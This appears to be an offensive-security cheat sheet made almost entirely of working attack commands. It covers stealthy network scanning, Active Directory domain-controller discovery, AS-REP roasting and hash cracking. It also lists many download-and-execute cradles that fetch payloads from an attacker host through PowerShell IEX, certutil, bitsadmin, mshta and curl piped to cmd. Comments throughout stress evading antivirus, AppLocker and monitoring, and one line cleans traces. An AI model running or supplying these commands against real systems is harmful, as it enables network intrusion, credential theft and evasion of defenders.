# -l: Scan local network
# -I: Specify interface (better for multi-homed systems)
# -q: Quiet mode (less verbose)
sudo arp-scan -l -I eth0

# Alternative: Use native tools for stealth
ip neigh show  # View ARP cache without active scanning

# Modern approach with better stealth options
# -sn: Ping scan (no port scan)
# -PE: ICMP Echo Request
# -PP: ICMP Timestamp Request  
# -PS443: TCP SYN to port 443
# -PA80: TCP ACK to port 80
# --min-rate 1000: Minimum packet rate
# -T4: Timing template (balance speed/stealth)
# --disable-arp-ping: Avoid ARP queries on local networks if stealth needed
sudo nmap -sn -PE -PP -PS443 -PA80 --min-rate 1000 -T4 10.10.10.0/24 -oA nmap/ping_scan

# Stealth alternative: Slower scan with randomization
sudo nmap -sn -PS443,8443 -PA80,8080 --randomize-hosts -T2 10.10.10.0/24 -oA nmap/stealth_scan

# Masscan is extremely fast but very noisy
# --rate: Packets per second (adjust based on bandwidth and stealth needs)
# --banners: Grab service banners (adds detection risk)
# --exclude: Exclude ranges (e.g., your own infrastructure)
sudo masscan 10.10.10.0/24 -p80,443,3389,445 --rate=2000 -oL masscan_results.txt

# Better OPSEC: Combine with exclude file and slower rate
sudo masscan 10.10.10.0/24 -p80,443 --rate=500 --excludefile exclude.txt -oJ masscan.json

# Modern alternative: RustScan (faster Nmap wrapper)
rustscan -a 10.10.10.0/24 -p 80,443,3389 -- -sV -oA rustscan_output

# Import required (often already loaded on domain systems)
Import-Module ActiveDirectory -ErrorAction SilentlyContinue

# Discovers any available DC in the current domain
Get-ADDomainController -Discover

# Discovers the Primary Domain Controller (PDC) Emulator FSMO role holder
Get-ADDomainController -Discover -Service PrimaryDC

# List all DCs with details
Get-ADDomainController -Filter * | Select-Object Name, IPv4Address, OperatingSystem

# Discover DC in specific domain (useful for multi-domain environments)
Get-ADDomainController -Discover -DomainName contoso.local

# Lists all DCs in the specified domain
nltest /dclist:contoso.local

# Query DNS for LDAP SRV records (works from non-domain machines)
nslookup -type=SRV _ldap._tcp.dc._msdcs.contoso.local

# Alternative DNS queries for additional information
nslookup -type=SRV _kerberos._tcp.dc._msdcs.contoso.local
nslookup -type=SRV _ldap._tcp.pdc._msdcs.contoso.local

# Native Windows tool (very low detection risk)
set log  # Shows LOGONSERVER environment variable pointing to authenticating DC

# DNS-based discovery (no AD module required)
Resolve-DnsName -Name _ldap._tcp.dc._msdcs.contoso.local -Type SRV | Select-Object Name, Target, Port

# Discover current logon DC
$env:LOGONSERVER

# .NET approach (works on older PowerShell versions)
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().DomainControllers | Select-Object Name, IPAddress

# Alternative using WMI (stealthier, native Windows)
(Get-WmiObject -Class Win32_NTDomain).DomainControllerName

# Requires valid username list (enumerate users first to reduce noise)
# -dc-ip: Target DC directly (avoids DNS queries)
# -format hashcat: Output for Hashcat
# -no-pass: Don't prompt for password
impacket-GetNPUsers contoso.local/ -usersfile users.txt -format hashcat -outputfile asrep_hashes.txt -dc-ip 10.10.10.5 -no-pass

# Single user check (less noisy)
impacket-GetNPUsers contoso.local/username -no-pass -dc-ip 10.10.10.5

# With domain credentials (appears as legitimate authentication)
impacket-GetNPUsers contoso.local/validuser:password -request -format hashcat -outputfile asrep.txt -dc-ip 10.10.10.5

# From compromised host with DC network access
.\Rubeus.exe asreproast /outfile:asrep_hashes.txt /format:hashcat

# Target specific user (reduces noise)
.\Rubeus.exe asreproast /user:targetuser /format:hashcat

# Use specific DC
.\Rubeus.exe asreproast /dc:DC01.contoso.local /format:hashcat /outfile:hashes.txt

# Modern: Combine with user enumeration
.\Rubeus.exe asreproast /format:hashcat /outfile:asrep.txt /nowrap

# Hashcat mode 18200 for AS-REP
hashcat -m 18200 asrep_hashes.txt /path/to/wordlist.txt -O

# With rules for better coverage
hashcat -m 18200 asrep_hashes.txt /path/to/wordlist.txt -r rules/best64.rule

# John the Ripper
john --wordlist=/path/to/wordlist.txt --format=krb5asrep asrep_hashes.txt

# Show cracked hashes
hashcat -m 18200 asrep_hashes.txt --show
john --show --format=krb5asrep asrep_hashes.txt

# Modern approach with better error handling
try {
    $script = (New-Object System.Net.WebClient).DownloadString('http://<ATTACKER_IP>/script.ps1')
    Invoke-Expression $script
} catch {
    Write-Error "Download failed: $_"
}

# Using Invoke-RestMethod (modern, supports HTTPS better)
IEX (Invoke-RestMethod -Uri 'https://<ATTACKER_IP>/script.ps1')

# With user-agent spoofing (better OPSEC)
$wc = New-Object System.Net.WebClient
$wc.Headers.Add('User-Agent', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)')
IEX ($wc.DownloadString('https://<ATTACKER_IP>/script.ps1'))

# Bypass execution policy (if needed)
powershell -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString('https://<ATTACKER_IP>/script.ps1')"

# Standard download
(New-Object Net.WebClient).DownloadFile('http://<ATTACKER_IP>/payload.exe', 'C:\Users\Public\payload.exe')

# Modern: Invoke-WebRequest (better HTTPS support)
Invoke-WebRequest -Uri 'https://<ATTACKER_IP>/payload.exe' -OutFile 'C:\Users\Public\payload.exe'

# With proxy-aware settings
$wc = New-Object System.Net.WebClient
$wc.Proxy = [System.Net.WebRequest]::GetSystemWebProxy()
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials
$wc.DownloadFile('https://<ATTACKER_IP>/payload.exe', 'C:\temp\payload.exe')

# Short alias (PowerShell 3.0+)
iwr -Uri 'https://<ATTACKER_IP>/file.exe' -OutFile 'C:\temp\file.exe'

# These remain functional but heavily monitored
IEX (New-Object Net.WebClient).DownloadString('http://<ATTACKER_IP>/script.ps1')
IEX (IWR -Uri http://<ATTACKER_IP>/script.ps1 -UseBasicParsing).Content

# Base64 encoded command (bypasses some basic filtering)
$cmd = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('BASE64_ENCODED_COMMAND'))
IEX $cmd

:: Download a file (commonly flagged by AV/EDR)
certutil.exe -urlcache -split -f http://<ATTACKER_IP>/payload.exe C:\Users\Public\payload.exe

:: Decode base64 (still useful for staged payloads)
certutil.exe -decode C:\temp\payload.b64 C:\temp\payload.exe

:: Encode to base64 (useful for data exfiltration)
certutil.exe -encode C:\temp\data.txt C:\temp\data.b64

:: Clean URL cache (remove traces)
certutil.exe -urlcache * delete

:: Basic download (generates BITS job logs)
bitsadmin /transfer myJob /download /priority normal http://<ATTACKER_IP>/payload.exe C:\Users\Public\payload.exe

:: Better approach: Create, add, resume, complete (more control)
bitsadmin /create myJob
bitsadmin /addfile myJob http://<ATTACKER_IP>/file.exe C:\temp\file.exe
bitsadmin /resume myJob
bitsadmin /complete myJob

:: Modern alternative: PowerShell BITS cmdlets (less suspicious)
Start-BitsTransfer -Source http://<ATTACKER_IP>/file.exe -Destination C:\temp\file.exe

:: Execute remote HTA (VBScript/JScript payload)
mshta.exe http://<ATTACKER_IP>/payload.hta

:: Inline VBScript execution (no remote file)
mshta.exe vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""cmd.exe"",0:close")

:: JavaScript variant
mshta.exe javascript:alert('test');close();

:: curl.exe (Windows 10 1803+, native and less suspicious)
curl.exe -o C:\temp\file.exe http://<ATTACKER_IP>/file.exe

:: tar.exe (Windows 10+, for compressed payloads)
curl.exe -o C:\temp\archive.tar.gz http://<ATTACKER_IP>/archive.tar.gz
tar.exe -xf C:\temp\archive.tar.gz -C C:\temp\

:: expand.exe (extract CAB files, native to Windows)
expand.exe \\<ATTACKER_IP>\share\payload.cab -F:* C:\temp\

:: forfiles.exe (execute commands, bypass AppLocker in some configs)
forfiles /p C:\Windows\System32 /m cmd.exe /c "cmd.exe /c curl http://<ATTACKER_IP>/script.bat | cmd"